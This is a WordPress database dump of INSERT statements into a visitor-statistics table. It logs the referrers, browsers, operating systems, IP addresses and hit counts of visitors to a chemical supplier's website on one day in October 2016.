INSERT INTO `wp_statistics_visitor` VALUES (10612, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.18.139.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10613, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.01', '', '95.77.105.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10614, '2016-10-24', 'https://www.bing.com/search?q=miller+stephenson&src=IE-SearchBox&FORM=IENTSR&pc=EUPP_', 'MSIE', 'Windows', '11.0', '', '114.35.104.87', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10615, '2016-10-24', 'https://www.miller-stephenson.com', 'PHPCrawl', 'Unknown', 'Unknown', '', '62.210.146.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10616, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10617, '2016-10-24', 'https://www.miller-stephenson.com/product/gpl-200/', 'Vivaldi', 'Windows', '1.4.589.38', '', '99.196.41.21', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10618, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.50.150.225', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10619, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.134.11.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10620, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.128.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10621, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.188.92.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10622, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.29.124.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10623, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.193.64.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10624, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '188.165.28.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10625, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.91.194.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10626, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.181.190.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10627, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.239.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10628, '2016-10-24', 'https://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10629, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.147.243.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10630, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.139.36.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10631, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.215.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10632, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.215.3.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10633, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '192.168.1.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10634, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.140.234.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10635, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.237.15.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10636, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.146.37.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10637, '2016-10-24', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.9.0', '', '95.110.194.252', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10638, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.71.59.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10639, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.244.60.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10640, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.199.222.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10641, '2016-10-24', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.183.198', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10642, '2016-10-24', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.119.115.234', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10643, '2016-10-24', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10644, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '158.58.129.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10645, '2016-10-24', 'https://www.miller-stephenson.com/chemicals/solvents/solvsys/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.180', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10646, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10647, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10648, '2016-10-24', 'https://www.baidu.com/link?url=IaDI7RBkQfTR8BB-o5SsVcYz54WUcB4yiBFBpkGtQYOYd8q9kloFLbLujg0fwdCNaArwgTtBLbN-Ll2rZrMIjTtHVcMdJftxvfWs86g7E2y&wd=&eqid=d3d10edd0007618500000005580d99c7', 'MSIE', 'Windows', '11.0', '', '202.111.36.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10649, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.158.234.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10650, '2016-10-24', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwixiMTq2PLPAhXCFpQKHQ2_Bh4QFghNMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-52%2F&usg=AFQjCNFdgoJUoi3B25XK9qLqegNqbQkfzg', 'MSIE', 'Windows', '11.0', '', '1.212.127.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10651, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '122.171.191.104', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10652, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.104.200.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10653, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.98.90.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10654, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.117.102.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10655, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '188.165.29.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10656, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.172.27.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10657, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.214.130.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10658, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.124.153.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10659, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.93.189.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10660, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.194.243.147', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10661, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.145.64.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10662, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.124.152.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10663, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.125.197.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10664, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '146.158.7.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10665, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.79.7.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10666, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.82', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10667, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.155.192.84', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10668, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.197.96.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10669, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.129.148.216', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10670, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.24.132.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10671, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.108.79.47', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10672, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.5.6', '', '37.1.218.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10673, '2016-10-24', 'https://www.google.com.sg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjVkKLV6fLPAhWLvBQKHX1TBYUQFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.136593572,d.bGs', 'MSIE', 'Windows', '11.0', '', '118.201.6.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10674, '2016-10-24', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '124.124.20.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10675, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.166.198.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10676, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.78.157.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10677, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.230.14.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10678, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.244.194.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10679, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.242.88.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10680, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.242.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10681, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.206.133.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10682, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.67.23.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10683, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.211.195.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10684, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.111.147.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10685, '2016-10-24', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjz6YHd7fLPAhWEBBoKHaG3A_cQjBAILDAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.136593572,d.d2s', 'MSIE', 'Windows', '11.0', '', '10.195.146.194', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10686, '2016-10-24', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '11.0', '', '122.117.22.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10687, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.172.8.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10688, '2016-10-24', 'https://www.ask.com/web?q=Chemical Company LLC Contact: Email&frstpgo=0&page=8', 'MSIE', 'Windows', '9.0', '', '154.16.63.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10689, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.68.244.82', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10690, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.51.176.145', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10691, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.43.241.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10692, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.41.59.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10693, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '195.169.99.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10694, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10695, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '60.47.135.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10696, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.30.213.50', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10697, '2016-10-24', 'https://www.google.com.tw/', 'Chrome', 'Windows', '45.0.2454.101', '', '59.125.8.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10698, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.122.233.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10699, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.140.78.78', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10700, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.235.78.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10701, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.27.12.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10702, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.194.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10703, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.59.109.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10704, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '11.0', '', '70.32.40.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10705, '2016-10-24', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10706, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.46.152.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10707, '2016-10-24', 'https://www.google.it/', 'Chrome', 'Windows', '54.0.2840.71', '', '79.62.45.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10708, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.241.255.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10709, '2016-10-24', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%2F%3Bweb%3B%3B&text=&etext=1219.X5Z1WZy_uj4o3qXGZS_DVpXq46xKuc8b4dlEIur_lEtV7aH2e8Ae9uvkZ1cNKYLZUjGF9neGAIbmCYh5BUsGDpIUkcu-jQ1R1s0Rz0_v9DEyidrJLvdsPH05M41R2z1_.1282df9a5489f756c39dbc35a6c1fa1983c7d708&uuid=&state=PEtFfuTeVD5kpHnK9lio9bb4iM1VPfe4W5x0C0-qwflIRTTifi6VAA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVElzTnE4Z1dBLVRYR3k1VVd0b2xaWVpvWDI0WWppTEZmSHB4QnZOR3JQUVRpcGZMRENad1kwZw&b64e=2&sign=1ac08f81fda700876df326d951a9a9b1&keyno=0&cst=AiuY0DBWFJ5fN_r-AEszk9-gaBNfN6YgTZdT93yt_N0_Aywdp-SwODhywZurYY6girnU23Sy_c6CRmJK3GGLFL4ggZNHMffAWPzISlCaNFjuqQkL_dEXH-42GnsBXeI3EWg55dWPasQYgj1knAyUuZc9w42_vj8pA5OMtKX4stlKy1he4XWMaOs6p3bajoHPrU6eVuVTY-HljvzwenObDpAg4yxFAdHmYIJaAvA8gox-5cMgyG7HPqKt7rVyFphiighBZgeUR9WP2RSpnR-IwijLk92h8VCrQnQ4_X53FCFrp9dX6Ykw5gOx4bjmU38Vdzh33bNJfPxDUHxBGE0cdDP_qp70m1oYbOvMKomUU__mGRrXWkLuc-R9487MtJsk73uZ3rhDxv_JxKhGwXrSHUlYIpxtg0UqnfbNP2ftK-hnqZqGNRotC6Rs7KsW7T5JS2BaYSD9kZhDChIgi_56R2I5NU45eNtroAKZGmsnZRpDMis-sTG6FQjJwvCnaA4YwbndPGBfBuckSWqFykEVqDEEKnHvcfx078CTgZMJZ9S6StvKQ_z4lUsrWdVukt8xu88UjX1iOdGy62PSepPiJqC8jWxjERTMNB_YUpfaCQVSZPU6fYq9Ooyo7VHQQYPvuf2XAZElazT4_a1KpUuLkQ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kpq7dacf8l3UYNdYA-QFVsMMXYwRSy9f8oGqnCEKEH_5OLjHYD9ldNRc84lThCj9zGWyMD5jk5sgWBnjTmBe8VsiY6Q4UH9wpXduErTJvKlLG9-iga5p88DsX6NSx1KFSP0crL5Uc7KhQsQwP3RycHll67LgDLiMpstbZ7t-DE5OrVcUv7WGxnqK6PhLI_RGLaPVh2SZ3uMsbSXibVfPrfYlBrFnVlaPOPGC5m7yJC5mr4H9Hoa_PJ6FRCES2kV3QQqIQlWei-cRx-26TrZzHNbOKz8aYYYj_uDAwb8FiVFLkR7I2xyCqTsLJu3IPAbIu_HrONiyCf7xs&l10n=ru&cts=1477295736910&mc=5.508965032172277', 'Edge', 'Windows', '14.14393', '', '91.206.63.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10710, '2016-10-24', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10711, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.75.142.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10712, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10713, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.198.207.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10714, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '103.59.179.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10715, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.138.206.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10716, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.81.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10717, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.169.37', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10718, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.157.46.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10719, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.159.122.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10720, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '180.252.55.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10721, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.108.9', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10722, '2016-10-24', 'https://www.google.de/', 'Chrome', 'Windows', '54.0.2840.71', '', '217.92.110.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10723, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10724, '2016-10-24', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjVgMPBhvPPAhUJDcAKHTo8AwAQFggtMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '81.105.178.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10725, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.188.127.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10726, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.101.184.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10727, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.147.15.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10728, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.251.182.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10729, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.44.168.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10730, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.46.191.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10731, '2016-10-24', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '192.168.0.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10732, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.229.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10733, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10734, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.60.136.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10735, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.35.173.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10736, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.59.37.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10737, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.28.175.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10738, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.124.154.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10739, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '123.126.68.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10740, '2016-10-24', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjwu-_1kfPPAhUJLpQKHaXdA_kQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.dGo', 'MSIE', 'Windows', '11.0', '', '124.46.22.62', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10741, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10742, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.25.120.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10743, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.44.62.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10744, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.0.204.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10745, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.39.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10746, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.60.26', '000', 1, 0); 
